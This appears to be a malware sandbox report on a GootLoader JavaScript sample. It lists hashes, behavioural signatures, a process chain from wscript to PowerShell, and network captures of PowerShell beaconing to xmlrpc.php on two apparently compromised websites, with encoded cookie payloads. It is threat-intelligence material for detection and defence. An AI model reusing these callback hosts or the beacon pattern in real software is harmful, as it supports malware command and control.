Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

f78bcfb800...579.js

windows7-x64

10

f78bcfb800...579.js

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/03/2025, 20:53 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f78bcfb8006be9862eab9ea95796547e26310c2535244f840fdade8eee63f579.js

  • Size

    140KB

  • MD5

    d6965f6455717a0b0bddff6d928d63e9

  • SHA1

    0a6d31d21aa3c6457cd70811b580eba1ebaa8ff2

  • SHA256

    f78bcfb8006be9862eab9ea95796547e26310c2535244f840fdade8eee63f579

  • SHA512

    71474421a619f2d2e529a34d1897dcc249aeda373190bec6d0b440a93d865a8d46fc09a8bb26a15ecc350f0ade635f76babb59e7bcb50a30270b031eab5088eb

  • SSDEEP

    3072:N+VTeMUatEduPTeAbZ0i36Gg0yPE4ABWPDrzvZ:STl0u7eA90iqGg0ylPDnZ

Score
10/10
gootloaderexecutionloader

Malware Config

Signatures

  • GootLoader

    JavaScript loader known for delivering other families such as Gootkit and Cobaltstrike.

    loadergootloader
  • Gootloader family
    gootloader
  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\f78bcfb8006be9862eab9ea95796547e26310c2535244f840fdade8eee63f579.js
    1⤵
      PID:1752
    • C:\Windows\system32\wscript.EXE
      C:\Windows\system32\wscript.EXE PATIEN~1.JS
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4192
      • C:\Windows\System32\cscript.exe
        "C:\Windows\System32\cscript.exe" "PATIEN~1.JS"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\System32\WindowsPowerShell\v1.0\PoweRsHELl.exe
          PoweRsHELl
          3⤵
          • Blocklisted process makes network request
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1052

    Network

    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.ax-0001.ax-msedge.net
      g-bing-com.ax-0001.ax-msedge.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=17417CDB63136D281522696962986C5B; domain=.bing.com; expires=Sat, 11-Apr-2026 20:57:03 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: DC3053EC0120480DA87A800BC4E6D363 Ref B: FRA31EDGE0408 Ref C: 2025-03-17T20:57:03Z
      date: Mon, 17 Mar 2025 20:57:02 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=17417CDB63136D281522696962986C5B
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=rD71uPPc8VVWh1y7KmTBS1s1ykWoJfdP5tOAnLyRii8; domain=.bing.com; expires=Sat, 11-Apr-2026 20:57:03 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 181A2B2956FD48AA9291EC8EB729F6D3 Ref B: FRA31EDGE0408 Ref C: 2025-03-17T20:57:03Z
      date: Mon, 17 Mar 2025 20:57:02 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=17417CDB63136D281522696962986C5B; MSPTC=rD71uPPc8VVWh1y7KmTBS1s1ykWoJfdP5tOAnLyRii8
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 4B5C811AFA15409DA57FC47DA9ACF3FE Ref B: FRA31EDGE0408 Ref C: 2025-03-17T20:57:03Z
      date: Mon, 17 Mar 2025 20:57:02 GMT
    • flag-us
      DNS
      c.pki.goog
      Remote address:
      8.8.8.8:53
      Request
      c.pki.goog
      IN A
      Response
      c.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.200.35
    • flag-gb
      GET
      http://c.pki.goog/r/r1.crl
      Remote address:
      142.250.200.35:80
      Request
      GET /r/r1.crl HTTP/1.1
      Cache-Control: max-age = 3000
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: c.pki.goog
      Response
      HTTP/1.1 304 Not Modified
      Date: Mon, 17 Mar 2025 20:13:51 GMT
      Expires: Mon, 17 Mar 2025 21:03:51 GMT
      Age: 2653
      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
      Cache-Control: public, max-age=3000
      Vary: Accept-Encoding
    • flag-us
      DNS
      aiimskalyani.edu.in
      PoweRsHELl.exe
      Remote address:
      8.8.8.8:53
      Request
      aiimskalyani.edu.in
      IN A
      Response
      aiimskalyani.edu.in
      IN A
      103.191.209.38
    • flag-in
      GET
      https://aiimskalyani.edu.in/xmlrpc.php
      PoweRsHELl.exe
      Remote address:
      103.191.209.38:443
      Request
      GET /xmlrpc.php HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
      Cookie: CAB41E62C0=H4sIAAAAAAAEAI1UXW+bMBT9K+ZtkybUJlU0LU8OmMSTjZFtkk6yiDLidUghIKBrK/Hja0NYyFqlewBx7zn3cj+ODQmJBeIi4izABCXeNxVVxUO1y/1ds2sdGEU+lND641pXtYL7PDsqWJYWV7zYGfOhdbwiz4vjKTTIDroepQKdQ/Wc3ngv4tPz19nnN2Ggc18L3szuppMPf8doFEvEQ0hRsiDRZgkj0SUSpU5t9CY77ounWtUvdaPz6USl+d7Vz7p1/Cr7oyvb8JgnBl4P1+pMa50Vo8jneG0n2lsRlKtkPMTWIcyD5IMJkyLdHSx1yUKzqDXiiVI+9P0fvdU6YUwXiG9ZsDVL9JAQjItk0jrsqLuK/s08+A1DJKdmtqFsHVshupeJa2Y1d9E9mrsLKOeuR/25u14I+zK+78I+5mMjAvtazV0qPEOLiMkxlLCF3FthiTwZc5RA6s/uxij2UShxgE07HQYCI6TDC5gBWuz1AdxOgWh0WRpxgckXAB+b3/rYZKkhj9MQtEYkmY1dHK2xwCxMbvY3ZgojNb8R91W5XsLXtPmX+b4QDRwvCPbOe4gefx6ytHV6BQ1LGmxeFM1IZ60jEY2uykNJnZeG9380e959RiEOR+fg7NxyBikOl8ONcMnpjs9JvtYe3RsX0n4yxWfVRRtMbChOaJZWRV38asAJALc3wMzrFY14OO2JBAAA; CAB41E62C01=H4sIAAAAAAAEAC2PwW7EIAxEv4VPaVeRuodqq02knlniJDSAkW1IIvHxhVJxGTzMw/PSZl8JU5gnzfsHshRlMGxdMDEXNTvX7/Phi4IzOiSgohYMMlPu3n12UJRj3RKPZbEGbs6afcJnCkVFPIB4A+eKesJqWeiqKgWxHt4J9wYcQZPZ3mIsioFyRVQW2/4B+0bmiOg417cxDqfc0D9eP20cOZs6FU3yCSENZwSyEAz0TtX9x1zssS40XixQ60it3ZyjqAlOuYeYpEdSYDC6LXPYUI/8CYdri397+0V5HH4BCpZdqkABAAA=; CAB41E62C02=H4sIAAAAAAAEAAtJrSjxzCsoLfHILy6J881MLsovzk8rUQgBiiuAJRQcCwpyMpMTSzLz8wBLKcATLgAAAA==; CAB41E62C03=H4sIAAAAAAAEAF2S3W7bMAyFX8V5gAlpuhfonDQIkKyB05/LQbaZWKgkaiTtJEUefpSbrNjuxE+UeHjIu+fOcbEtL5O7Cppz46H44aJGJUYh9MXWRvAaP7Rh5GtXkyUHfJnc/5/zE+SI9K6npwhzcgNcJjNNGoDkkTBscAAz1Pwv3YGYk+fTF11FJ8569wEmoeSLReukxJAImA0kvqJtz93t7eLkpIKQS9wfUhpJQpItJuOxUVWzJdkoG7DcE5iQvitaRRbr/dxxwD6K0pnStQtOduChEXMMGegH+SM+a+npxjWEjHspFu0h9/iURF98wJKwT2bgUfOWUPSD0iPDTWQFv3tgWURbe7WCOYyQYezOg4CB068bW4XcgFHB4fOxaiXNjHtH4Zr4qXJ0dv5afdvsMuvwWEGLNyW7nhPEtsR0NhD2Sl5inT25+v2M2ecRZ/oSU197p9bqpEd6jf9OoJOQ5/1mpemyNaaxtSa+kROoYMB3MC02Wnr6oE7VVooKbAtUzHXRpo+OYI/5dol40I0rO10D9XH6ui6LAK2zRfL2DPQHgFyWR54CAAA=; CAB41E62C04=H4sIAAAAAAAEAHOOMzI2NDM1MTM2NzWzqFF0izMzNDQ0MjYyAADsmH8NGgAAAA==
      Host: aiimskalyani.edu.in
      Connection: Close
      Response
      HTTP/1.1 403 Forbidden
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 1242
      date: Mon, 17 Mar 2025 20:58:22 GMT
      server: LiteSpeed
      vary: User-Agent
      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    • flag-in
      GET
      https://aiimskalyani.edu.in/xmlrpc.php
      PoweRsHELl.exe
      Remote address:
      103.191.209.38:443
      Request
      GET /xmlrpc.php HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
      Cookie: CAB41E62C0=H4sIAAAAAAAEAI1UXW+bMBT9K+ZtkybUJlU0LU8OmMSTjZFtkk6yiDLidUghIKBrK/Hja0NYyFqlewBx7zn3cj+ODQmJBeIi4izABCXeNxVVxUO1y/1ds2sdGEU+lND641pXtYL7PDsqWJYWV7zYGfOhdbwiz4vjKTTIDroepQKdQ/Wc3ngv4tPz19nnN2Ggc18L3szuppMPf8doFEvEQ0hRsiDRZgkj0SUSpU5t9CY77ounWtUvdaPz6USl+d7Vz7p1/Cr7oyvb8JgnBl4P1+pMa50Vo8jneG0n2lsRlKtkPMTWIcyD5IMJkyLdHSx1yUKzqDXiiVI+9P0fvdU6YUwXiG9ZsDVL9JAQjItk0jrsqLuK/s08+A1DJKdmtqFsHVshupeJa2Y1d9E9mrsLKOeuR/25u14I+zK+78I+5mMjAvtazV0qPEOLiMkxlLCF3FthiTwZc5RA6s/uxij2UShxgE07HQYCI6TDC5gBWuz1AdxOgWh0WRpxgckXAB+b3/rYZKkhj9MQtEYkmY1dHK2xwCxMbvY3ZgojNb8R91W5XsLXtPmX+b4QDRwvCPbOe4gefx6ytHV6BQ1LGmxeFM1IZ60jEY2uykNJnZeG9380e959RiEOR+fg7NxyBikOl8ONcMnpjs9JvtYe3RsX0n4yxWfVRRtMbChOaJZWRV38asAJALc3wMzrFY14OO2JBAAA; CAB41E62C01=H4sIAAAAAAAEAC2P3W7DIAyFn4VH2apI68XUqam0a0qchgWwZRuSSDz8YJl847/z+dhhWlC0GicsUs0UwllPW6wGdgrIwNXMmHTics6uU4BqgtiuuM2zd3AJ3q0PvOdUDeEGLAuEUM0dXl6Uj5blpD7CO+PagSNYdssbUTUCXBqiscSfByR2shBikNJ2iYZdLxhvz5/eJimuddWyfkLKw07AHpKDj1Nd3D/mkIjN0HiIQntHrax9slXzgF2vibKekpwEnO1mNp9a6F8S8NXl39F/cRmHXyZMoLUsAQAA; CAB41E62C02=H4sIAAAAAAAEAAtJrSjxzCsoLfHILy6J881MLsovzk8rUQgBiiuAJRQcCwpyMpMTSzLz8wBLKcATLgAAAA==; CAB41E62C03=H4sIAAAAAAAEAF2S3W7bMAyFX8V5gAlpuhfonDQIkKyB05/LQbaZWKgkaiTtJEUefpSbrNjuxE+UeHjIu+fOcbEtL5O7Cppz46H44aJGJUYh9MXWRvAaP7Rh5GtXkyUHfJnc/5/zE+SI9K6npwhzcgNcJjNNGoDkkTBscAAz1Pwv3YGYk+fTF11FJ8569wEmoeSLReukxJAImA0kvqJtz93t7eLkpIKQS9wfUhpJQpItJuOxUVWzJdkoG7DcE5iQvitaRRbr/dxxwD6K0pnStQtOduChEXMMGegH+SM+a+npxjWEjHspFu0h9/iURF98wJKwT2bgUfOWUPSD0iPDTWQFv3tgWURbe7WCOYyQYezOg4CB068bW4XcgFHB4fOxaiXNjHtH4Zr4qXJ0dv5afdvsMuvwWEGLNyW7nhPEtsR0NhD2Sl5inT25+v2M2ecRZ/oSU197p9bqpEd6jf9OoJOQ5/1mpemyNaaxtSa+kROoYMB3MC02Wnr6oE7VVooKbAtUzHXRpo+OYI/5dol40I0rO10D9XH6ui6LAK2zRfL2DPQHgFyWR54CAAA=; CAB41E62C04=H4sIAAAAAAAEAHOOMzI2NDM1MTM2NzWzqFF0izMzNDQ0MjYyAADsmH8NGgAAAA==
      Host: aiimskalyani.edu.in
      Connection: Close
      Response
      HTTP/1.1 403 Forbidden
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 1242
      date: Mon, 17 Mar 2025 20:58:43 GMT
      server: LiteSpeed
      vary: User-Agent
      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    • flag-us
      DNS
      pcpro100.info
      PoweRsHELl.exe
      Remote address:
      8.8.8.8:53
      Request
      pcpro100.info
      IN A
      Response
      pcpro100.info
      IN A
      104.21.64.1
      pcpro100.info
      IN A
      104.21.32.1
      pcpro100.info
      IN A
      104.21.112.1
      pcpro100.info
      IN A
      104.21.48.1
      pcpro100.info
      IN A
      104.21.16.1
      pcpro100.info
      IN A
      104.21.80.1
      pcpro100.info
      IN A
      104.21.96.1
    • flag-us
      GET
      https://pcpro100.info/xmlrpc.php
      PoweRsHELl.exe
      Remote address:
      104.21.64.1:443
      Request
      GET /xmlrpc.php HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
      Cookie: CAB41E62C0=H4sIAAAAAAAEAI1UXW+bMBT9K+ZtkybUJlU0LU8OmMSTjZFtkk6yiDLidUghIKBrK/Hja0NYyFqlewBx7zn3cj+ODQmJBeIi4izABCXeNxVVxUO1y/1ds2sdGEU+lND641pXtYL7PDsqWJYWV7zYGfOhdbwiz4vjKTTIDroepQKdQ/Wc3ngv4tPz19nnN2Ggc18L3szuppMPf8doFEvEQ0hRsiDRZgkj0SUSpU5t9CY77ounWtUvdaPz6USl+d7Vz7p1/Cr7oyvb8JgnBl4P1+pMa50Vo8jneG0n2lsRlKtkPMTWIcyD5IMJkyLdHSx1yUKzqDXiiVI+9P0fvdU6YUwXiG9ZsDVL9JAQjItk0jrsqLuK/s08+A1DJKdmtqFsHVshupeJa2Y1d9E9mrsLKOeuR/25u14I+zK+78I+5mMjAvtazV0qPEOLiMkxlLCF3FthiTwZc5RA6s/uxij2UShxgE07HQYCI6TDC5gBWuz1AdxOgWh0WRpxgckXAB+b3/rYZKkhj9MQtEYkmY1dHK2xwCxMbvY3ZgojNb8R91W5XsLXtPmX+b4QDRwvCPbOe4gefx6ytHV6BQ1LGmxeFM1IZ60jEY2uykNJnZeG9380e959RiEOR+fg7NxyBikOl8ONcMnpjs9JvtYe3RsX0n4yxWfVRRtMbChOaJZWRV38asAJALc3wMzrFY14OO2JBAAA; CAB41E62C01=H4sIAAAAAAAEAC2P3W7DIAyFn4VH2apI68XUqam0a0qchgWwZRuSSDz8YJl847/z+dhhWlC0GicsUs0UwllPW6wGdgrIwNXMmHTics6uU4BqgtiuuM2zd3AJ3q0PvOdUDeEGLAuEUM0dXl6Uj5blpD7CO+PagSNYdssbUTUCXBqiscSfByR2shBikNJ2iYZdLxhvz5/eJimuddWyfkLKw07AHpKDj1Nd3D/mkIjN0HiIQntHrax9slXzgF2vibKekpwEnO1mNp9a6F8S8NXl39F/cRmHXyZMoLUsAQAA; CAB41E62C02=H4sIAAAAAAAEAAtJrSjxzCsoLfHILy6J881MLsovzk8rUQgBiiuAJRQcCwpyMpMTSzLz8wBLKcATLgAAAA==; CAB41E62C03=H4sIAAAAAAAEAF2S3W7bMAyFX8V5gAlpuhfonDQIkKyB05/LQbaZWKgkaiTtJEUefpSbrNjuxE+UeHjIu+fOcbEtL5O7Cppz46H44aJGJUYh9MXWRvAaP7Rh5GtXkyUHfJnc/5/zE+SI9K6npwhzcgNcJjNNGoDkkTBscAAz1Pwv3YGYk+fTF11FJ8569wEmoeSLReukxJAImA0kvqJtz93t7eLkpIKQS9wfUhpJQpItJuOxUVWzJdkoG7DcE5iQvitaRRbr/dxxwD6K0pnStQtOduChEXMMGegH+SM+a+npxjWEjHspFu0h9/iURF98wJKwT2bgUfOWUPSD0iPDTWQFv3tgWURbe7WCOYyQYezOg4CB068bW4XcgFHB4fOxaiXNjHtH4Zr4qXJ0dv5afdvsMuvwWEGLNyW7nhPEtsR0NhD2Sl5inT25+v2M2ecRZ/oSU197p9bqpEd6jf9OoJOQ5/1mpemyNaaxtSa+kROoYMB3MC02Wnr6oE7VVooKbAtUzHXRpo+OYI/5dol40I0rO10D9XH6ui6LAK2zRfL2DPQHgFyWR54CAAA=; CAB41E62C04=H4sIAAAAAAAEAHOOMzI2NDM1MTM2NzWzqFF0izMzNDQ0MjYyAADsmH8NGgAAAA==
      Host: pcpro100.info
      Connection: Close
      Response
      HTTP/1.1 405 Method Not Allowed
      Date: Mon, 17 Mar 2025 20:59:04 GMT
      Content-Type: text/plain;charset=UTF-8
      Content-Length: 42
      Connection: close
      Server: cloudflare
      X-Robots-Tag: noindex, follow
      Allow: POST
      Cf-Cache-Status: DYNAMIC
      Set-Cookie: ppwp_wp_session=98e2cbb022bc12cd383774796afe42fb%7C%7C1742246944%7C%7C1742246584; Max-Age=1800; Expires=Mon, 17 Mar 2025 21:29:04 GMT
      CF-RAY: 921f6978680e71c2-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-in
      GET
      https://aiimskalyani.edu.in/xmlrpc.php
      PoweRsHELl.exe
      Remote address:
      103.191.209.38:443
      Request
      GET /xmlrpc.php HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
      Cookie: CAB41E62C0=H4sIAAAAAAAEAI1UXW+bMBT9K+ZtkybUJlU0LU8OmMSTjZFtkk6yiDLidUghIKBrK/Hja0NYyFqlewBx7zn3cj+ODQmJBeIi4izABCXeNxVVxUO1y/1ds2sdGEU+lND641pXtYL7PDsqWJYWV7zYGfOhdbwiz4vjKTTIDroepQKdQ/Wc3ngv4tPz19nnN2Ggc18L3szuppMPf8doFEvEQ0hRsiDRZgkj0SUSpU5t9CY77ounWtUvdaPz6USl+d7Vz7p1/Cr7oyvb8JgnBl4P1+pMa50Vo8jneG0n2lsRlKtkPMTWIcyD5IMJkyLdHSx1yUKzqDXiiVI+9P0fvdU6YUwXiG9ZsDVL9JAQjItk0jrsqLuK/s08+A1DJKdmtqFsHVshupeJa2Y1d9E9mrsLKOeuR/25u14I+zK+78I+5mMjAvtazV0qPEOLiMkxlLCF3FthiTwZc5RA6s/uxij2UShxgE07HQYCI6TDC5gBWuz1AdxOgWh0WRpxgckXAB+b3/rYZKkhj9MQtEYkmY1dHK2xwCxMbvY3ZgojNb8R91W5XsLXtPmX+b4QDRwvCPbOe4gefx6ytHV6BQ1LGmxeFM1IZ60jEY2uykNJnZeG9380e959RiEOR+fg7NxyBikOl8ONcMnpjs9JvtYe3RsX0n4yxWfVRRtMbChOaJZWRV38asAJALc3wMzrFY14OO2JBAAA; CAB41E62C01=H4sIAAAAAAAEAC2P3W7DIAyFn4VH2apI68XUqam0a0qchgWwZRuSSDz8YJl847/z+dhhWlC0GicsUs0UwllPW6wGdgrIwNXMmHTics6uU4BqgtiuuM2zd3AJ3q0PvOdUDeEGLAuEUM0dXl6Uj5blpD7CO+PagSNYdssbUTUCXBqiscSfByR2shBikNJ2iYZdLxhvz5/eJimuddWyfkLKw07AHpKDj1Nd3D/mkIjN0HiIQntHrax9slXzgF2vibKekpwEnO1mNp9a6F8S8NXl39F/cRmHXyZMoLUsAQAA; CAB41E62C02=H4sIAAAAAAAEAAtJrSjxzCsoLfHILy6J881MLsovzk8rUQgBiiuAJRQcCwpyMpMTSzLz8wBLKcATLgAAAA==; CAB41E62C03=H4sIAAAAAAAEAF2S3W7bMAyFX8V5gAlpuhfonDQIkKyB05/LQbaZWKgkaiTtJEUefpSbrNjuxE+UeHjIu+fOcbEtL5O7Cppz46H44aJGJUYh9MXWRvAaP7Rh5GtXkyUHfJnc/5/zE+SI9K6npwhzcgNcJjNNGoDkkTBscAAz1Pwv3YGYk+fTF11FJ8569wEmoeSLReukxJAImA0kvqJtz93t7eLkpIKQS9wfUhpJQpItJuOxUVWzJdkoG7DcE5iQvitaRRbr/dxxwD6K0pnStQtOduChEXMMGegH+SM+a+npxjWEjHspFu0h9/iURF98wJKwT2bgUfOWUPSD0iPDTWQFv3tgWURbe7WCOYyQYezOg4CB068bW4XcgFHB4fOxaiXNjHtH4Zr4qXJ0dv5afdvsMuvwWEGLNyW7nhPEtsR0NhD2Sl5inT25+v2M2ecRZ/oSU197p9bqpEd6jf9OoJOQ5/1mpemyNaaxtSa+kROoYMB3MC02Wnr6oE7VVooKbAtUzHXRpo+OYI/5dol40I0rO10D9XH6ui6LAK2zRfL2DPQHgFyWR54CAAA=; CAB41E62C04=H4sIAAAAAAAEAHOOMzI2NDO1sLAwNTQyqFF0izMzNDQ0MjYyAABukmIPGgAAAA==
      Host: aiimskalyani.edu.in
      Connection: Close
      Response
      HTTP/1.1 403 Forbidden
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 1242
      date: Mon, 17 Mar 2025 20:59:25 GMT
      server: LiteSpeed
      vary: User-Agent
      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    • 150.171.27.10:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=
      tls, http2
      2.0kB
       9.4kB
       22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5860bb7c58314a7fa27a6bd00f89ff56&localId=w:ACC80AAA-1844-E958-013E-C7D282AA1E44&deviceId=6896216935759584&anid=

      HTTP Response

      204
    • 142.250.200.35:80
      http://c.pki.goog/r/r1.crl
      http
      384 B
       355 B
       4
      3

      HTTP Request

      GET http://c.pki.goog/r/r1.crl

      HTTP Response

      304
    • 103.191.209.38:443
      https://aiimskalyani.edu.in/xmlrpc.php
      tls, http
      PoweRsHELl.exe
      2.8kB
       5.5kB
       10
      11

      HTTP Request

      GET https://aiimskalyani.edu.in/xmlrpc.php

      HTTP Response

      403
    • 103.191.209.38:443
      https://aiimskalyani.edu.in/xmlrpc.php
      tls, http
      PoweRsHELl.exe
      2.8kB
       2.2kB
       8
      8

      HTTP Request

      GET https://aiimskalyani.edu.in/xmlrpc.php

      HTTP Response

      403
    • 104.21.64.1:443
      https://pcpro100.info/xmlrpc.php
      tls, http
      PoweRsHELl.exe
      2.7kB
       4.0kB
       10
      10

      HTTP Request

      GET https://pcpro100.info/xmlrpc.php

      HTTP Response

      405
    • 103.191.209.38:443
      https://aiimskalyani.edu.in/xmlrpc.php
      tls, http
      PoweRsHELl.exe
      2.8kB
       2.2kB
       8
      7

      HTTP Request

      GET https://aiimskalyani.edu.in/xmlrpc.php

      HTTP Response

      403
    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
       148 B
       1
      1

      DNS Request

      g.bing.com

      DNS Response

      150.171.27.10
      150.171.28.10

    • 8.8.8.8:53
      c.pki.goog
      dns
      56 B
       107 B
       1
      1

      DNS Request

      c.pki.goog

      DNS Response

      142.250.200.35

    • 8.8.8.8:53
      aiimskalyani.edu.in
      dns
      PoweRsHELl.exe
      65 B
       81 B
       1
      1

      DNS Request

      aiimskalyani.edu.in

      DNS Response

      103.191.209.38

    • 8.8.8.8:53
      pcpro100.info
      dns
      PoweRsHELl.exe
      59 B
       171 B
       1
      1

      DNS Request

      pcpro100.info

      DNS Response

      104.21.64.1
      104.21.32.1
      104.21.112.1
      104.21.48.1
      104.21.16.1
      104.21.80.1
      104.21.96.1

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3h4bfgxm.d03.ps1
      Filesize

      60B

